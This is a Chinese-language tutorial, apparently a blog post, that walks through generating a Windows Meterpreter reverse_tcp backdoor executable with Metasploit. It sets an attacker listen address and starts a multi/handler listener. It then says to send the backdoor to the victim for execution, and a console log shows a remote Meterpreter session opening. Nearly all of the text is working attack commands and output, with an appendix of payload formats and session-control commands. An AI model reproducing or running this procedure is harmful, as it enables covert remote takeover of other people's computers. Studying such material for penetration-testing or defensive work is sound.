一、後門生成
1.1 調用payload
msf > use payload/windows/meterpreter/reverse_tcp
1.2 使用show option 命令查看需要配置選項:
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
1.3 配置payload選項(此地的LHOST爲***者的IP地址)
msf payload(reverse_tcp) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.102 yes The listen address
LPORT 4444 yes The listen port
1.4 生成後門文件(-t 後製定後門文件的類型,本例爲exe ; -f 制定文件路徑和文件名)
msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe
[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...
二、配置漏洞利用端
2.1 配置exploit/multi/handler作爲利用端
msf > use exploit/multi/handler
2.2 選擇前邊生成後門對應的payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
2.3 配置選項中需要的監聽地址和端口
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
2.4 配置完成後使用exploit命令開始監聽
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
三、將生成的後門發送給客戶端執行
四、在監聽下的命令行等待客戶端上線,上線後會出現如下提示:
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
(一旦服務端退出,客戶端也會隨即退出)
附:
1、生成的後門可以支持多種格式,具體如下:
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
2、返回的連接可以使用background 將當前連接切換到後臺運行;
3、切換到後臺的會話可以使用session -i查看到,然後使用session -i id 將後臺的會話切換回前臺;
4、切換到後臺的會話可以使用session -i查看到,還可以使用session -k id 將後臺指定會話中斷;